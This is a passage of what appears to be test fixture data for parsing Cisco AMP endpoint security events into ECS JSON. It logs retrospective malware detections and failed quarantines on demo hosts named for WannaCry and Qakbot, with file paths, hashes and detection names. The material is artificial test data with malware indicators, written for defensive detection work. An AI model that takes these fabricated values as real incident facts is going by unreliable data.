delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine Attempt Failed", + "id": "6419264039066534000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": 
"8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Cannot delete", + "error_code": 3221225761 + }, + "detection_id": "6419229322845880359", + "event_type_id": 2164260893 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:55:46.000Z", + "file": { + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500168364Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":765000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective 
Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine", + "id": "6419264039066534000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419264039066533964", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648155 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:55:46.000Z", + "file": { + "name": "mssecsvc.exe", + "path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "hash": { + "sha1": "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3", + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "md5": "54a116ff80df6e6031059fc3036464df" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + 
"54a116ff80df6e6031059fc3036464df", + "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500170457Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":749000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6419264039066534000", + "category": [ + "file", + "malware" + ] + }, + 
"cisco": { + "amp": { + "detection": "W32.Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419264039066533964", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:55:46.000Z", + "file": { + "name": "mssecsvc.exe", + "path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "hash": { + "sha1": "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3", + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "md5": "54a116ff80df6e6031059fc3036464df" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "54a116ff80df6e6031059fc3036464df", + "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500172540Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":702000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective 
Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6419264039066534000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419229322845880359", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "file": { + "hash": { + "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": 
[ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500174721Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336648\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine Attempt Failed", + "id": "6412622782676337000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": 
{ + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6412622782676336648", + "event_type_id": 2164260893 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "file": { + "hash": { + "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500176777Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 
found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine Attempt Failed", + "id": "6412622782676337000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6412622782676336647", + "event_type_id": 2164260893 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "file": { + "hash": { + "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500178843Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":713000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine Attempt Failed", + "id": "6412622782676337000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + 
"detection_id": "6412622782676336646", + "event_type_id": 2164260893 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "file": { + "name": "kepv86368.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe", + "hash": { + "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500180907Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective 
Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6412622782676337000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.D177E09A9A-95.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6412622782676336647", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "file": { + "name": "uqlq0o884.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe", + "hash": { + "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { 
+ "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500182993Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6412622782676337000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": 
"W32.D177E09A9A-95.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6412622782676336646", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "file": { + "name": "120C.tmp", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp", + "hash": { + "sha1": "f5a171c879b90e77861daf19741b373646d791ff", + "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "md5": "32c9e6737dbdcbfb7563a3f27e2b1571" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "32c9e6737dbdcbfb7563a3f27e2b1571", + "f5a171c879b90e77861daf19741b373646d791ff" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500185061Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective 
Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336645\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"120C.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\120C.tmp\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6412622782676337000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.D177E09A9A-95.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6412622782676336645", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "file": { + "name": "QuotaGroup.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe", + "hash": { + "sha1": 
